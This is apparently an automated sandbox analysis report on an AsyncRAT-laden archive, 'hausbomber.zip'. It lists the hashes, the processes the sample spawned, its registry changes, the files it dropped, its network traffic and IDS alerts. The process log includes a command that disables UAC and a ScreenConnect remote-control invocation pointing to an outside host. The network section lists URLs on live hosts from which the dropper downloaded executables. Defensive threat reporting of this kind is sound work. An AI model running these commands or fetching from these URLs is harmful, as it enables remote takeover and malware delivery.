| File name: | hausbomber.zip |
| Full analysis: | https://app.any.run/tasks/f864a3ef-6cbc-414d-b60f-7501258eadd0 |
| Verdict: | Malicious activity |
| Threats: | AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. |
| Analysis date: | May 09, 2025, 23:44:10 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v5.1 to extract, compression method=AES Encrypted |
| MD5: | 7B6F55A9EE447B26636018C734D99DFF |
| SHA1: | 4CD828F2D3BF299AB907ED4042D171052B25E9BF |
| SHA256: | CD8A2526A63D0E8DFF0630F084C0C9F59D3CDEA363DF0F75BA8E2D28E5CD95E3 |
| SSDEEP: | 192:s7rTAuU2nS4O6rO33TYbK1Hoa79C6s1grY0pi73S:sj5nfO6r03TKQps2vi73S |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 51 |
|---|---|
| ZipBitFlag: | 0x0009 |
| ZipCompression: | Unknown (99) |
| ZipModifyDate: | 2025:05:09 22:34:52 |
| ZipCRC: | 0x31d44928 |
| ZipCompressedSize: | 4869 |
| ZipUncompressedSize: | 10752 |
| ZipFileName: | 4363463463464363463463463.exe.bin |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 132 | C:\WINDOWS\system32\cmd.exe /c ""C:\Games\c.cmd" " | C:\Windows\SysWOW64\cmd.exe | — | viewer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 15 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 236 | "C:\Program Files (x86)\ScreenConnect Client (d724279e76808474)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=control.gandizon.com&p=8041&s=5b8e1b6f-ee05-4413-a3f8-59777739d450&k=BgIAAACkAABSU0ExAAgAAAEAAQAZ3y3oX8w7yYbQbwWyh2tsuWyy101A0izwU5WSpslaCTqahFkxsNThqZ2DXJG4n044XCVtLTioTA%2bIgJI2aINklbR8nh7cKGX1Vr%2fmjKK9pbLSHNH2mS81X%2bYdRqhp6yvAx%2fUxhKJaGd%2b%2f6B72%2b3RbKPbQFKvQqBiVb3PXgQs38JKmzBzjGlUkPJIrK1KQAtSyvJ4rw7fOEz4n%2fsbd3gT3C7prgQ9DgT2yGxG6rBkvnagiKFFKjn%2bbaSwc%2bjPiQm8BVOiT3cWdyKBrHDRAZ%2fpUq8M3v2Ijio2SeWie8BFTOFNCxYF8asD%2fJDBEFaVDS65G%2brfPxRkfdRw%2fxjgRpgXM&c=plaza&c=&c=&c=&c=&c=&c=&c=" | C:\Program Files (x86)\ScreenConnect Client (d724279e76808474)\ScreenConnect.ClientService.exe | services.exe | ||||||||||||
User: SYSTEM Integrity Level: SYSTEM Version: 24.4.4.9118 Modules
| |||||||||||||||
| 616 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | dksngdsg.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: MSBuild.exe Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 660 | "C:\Users\admin\Desktop\hausbomber\Files\winsetaccess64.exe" | C:\Users\admin\Desktop\hausbomber\Files\winsetaccess64.exe | — | 4363463463464363463463463.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 664 | "C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d724279e76808474\ScreenConnect.ClientSetup.msi" | C:\Windows\SysWOW64\msiexec.exe | installer_ver09.10.25.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows® installer Exit code: 0 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 680 | netsh ipsec static add filterlist name=Allowlist | C:\Windows\SysWOW64\netsh.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Network Command Shell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 736 | taskkill /im rundll32.exe /f | C:\Windows\SysWOW64\taskkill.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 768 | "C:\Program Files (x86)\ScreenConnect Client (6fb02e5078751831)\ScreenConnect.WindowsClient.exe" "RunFile" "C:\Users\admin\Documents\ScreenConnect\Temp\MentosBoss.bat" | C:\Program Files (x86)\ScreenConnect Client (6fb02e5078751831)\ScreenConnect.WindowsClient.exe | — | ScreenConnect.WindowsClient.exe | |||||||||||
User: admin Company: ScreenConnect Software Integrity Level: MEDIUM Description: ScreenConnect Client Exit code: 0 Version: 24.3.7.9067 Modules
| |||||||||||||||
| 780 | "C:\Users\admin\Desktop\hausbomber\Files\ddosziller.exe" | C:\Users\admin\Desktop\hausbomber\Files\ddosziller.exe | 4363463463464363463463463.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 1.0.0.0 Modules
| |||||||||||||||
| 856 | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\preferences.zip | |||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\chromium_ext.zip | |||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip | |||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\hausbomber.zip | |||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath |
| Operation: | delete value | Name: | 15 |
Value: | |||
| (PID) Process: | (6372) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath |
| Operation: | delete value | Name: | 14 |
Value: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6372 | WinRAR.exe | C:\Users\admin\Desktop\hausbomber\4363463463464363463463463.exe.bin | executable | |
MD5:2A94F3960C58C6E70826495F76D00B85 | SHA256:2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE | |||
| 4608 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\hausbomber\Files\koko4.exe | html | |
MD5:82ED3DC33CD71025510A05B664EB558B | SHA256:F088B073091FFCA7CA0063658E01021738BE4665C4407BA475A8B9774E1B1CCB | |||
| 4608 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\hausbomber\Files\svchost.exe | executable | |
MD5:B373C11C594E3A3F2230860496F2507B | SHA256:2754CF43D44358046721E9FBD6CB1447154CC9F9DA62349E54576327FF3A5B02 | |||
| 4608 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\hausbomber\Files\ComplexDoS.exe | html | |
MD5:EA06B65498F0FD58E14B8EB30A860DCC | SHA256:6098D8EAF10B32F8881C56BAD9D5B5B20074B2CA27E4492D0A6170F9382B39C0 | |||
| 4608 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\hausbomber\Files\td.exe | executable | |
MD5:2C633C38BDD318467A5D0D0C56118308 | SHA256:81711D5F01C04629384F81B89C1C45CECCFEACBC79563F4345C93BD4FAFE9E75 | |||
| 4608 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\hausbomber\Files\02.08.2022.exe | binary | |
MD5:4CAB7C7FAC6B65B25BEC6E62B57ADCD1 | SHA256:BD65AC176DCB36EF0589C56406F8145E6086672F9BCFED5D8133627F787BD23F | |||
| 5404 | td.exe | C:\Users\admin\AppData\Local\Temp\Thunder7Install\7.10.34.360\InstallResource\BtnExperiences.png | image | |
MD5:66B21F4FD1C57E27F014E147B837FD13 | SHA256:E5EADB2A0347CB28E5BF8717E899C2BBDAFC634A0C2E518EBD185EF51786EAEB | |||
| 5404 | td.exe | C:\Users\admin\AppData\Local\Temp\Thunder7Install\7.10.34.360\InstallResource.zip | compressed | |
MD5:86370E89DD5E40065D5EEDD15EC67EE5 | SHA256:2925665C56B9DCF270618290151832648B0ABE8E3452C01FB6998B4F01EFEECA | |||
| 5404 | td.exe | C:\Users\admin\AppData\Local\Temp\Thunder7Install\7.10.34.360\InstallResource\CheckButton.png | image | |
MD5:EA80F053D52919721F2B22175F53EA61 | SHA256:C0F522A354E32F89C661A57529AAAA607D6C37DF394C3982BA5EFAA1E5D1F86A | |||
| 5404 | td.exe | C:\Users\admin\AppData\Local\Temp\Thunder7Install\7.10.34.360\InstallResource\CustomBtn.png | image | |
MD5:22409973498302B3DAA3C60696295E69 | SHA256:9EBB2578CE9F7C5091833A3FFEF861399110CD668BC35F1008610ED2C6C2BB83 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 23.48.23.141:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6148 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
4608 | 4363463463464363463463463.exe | GET | 200 | 43.142.161.126:8889 | http://43.142.161.126:8889/02.08.2022.exe | unknown | — | — | unknown |
6148 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
4608 | 4363463463464363463463463.exe | GET | 200 | 51.195.19.98:80 | http://irib-zx.persiangig.com/.uWpPAmYayO/DDOS/ComplexDoS.exe | unknown | — | — | unknown |
4608 | 4363463463464363463463463.exe | GET | 200 | 63.142.242.120:80 | http://63.142.242.120/td.exe | unknown | — | — | unknown |
4608 | 4363463463464363463463463.exe | GET | 200 | 62.109.140.53:80 | http://kokopellz.4fan.cz/koko4.exe | unknown | — | — | whitelisted |
4608 | 4363463463464363463463463.exe | GET | 200 | 211.204.100.20:1234 | http://211.204.100.20:1234/winsetaccess64.exe | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 23.48.23.141:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 20.190.159.75:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2104 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6148 | SIHClient.exe | 4.175.87.197:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
urlhaus.abuse.ch |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Misc activity | ET INFO DNS Query to Alibaba Cloud CDN Domain (aliyuncs .com) |
4608 | 4363463463464363463463463.exe | Misc activity | ET INFO Observed Alibaba Cloud CDN Domain (aliyuncs .com in TLS SNI) |
4608 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
4608 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
4608 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
4608 | 4363463463464363463463463.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
4608 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4608 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
5404 | td.exe | A Network Trojan was detected | ET USER_AGENTS Suspicious User-Agent (HTTP Downloader) |
4608 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |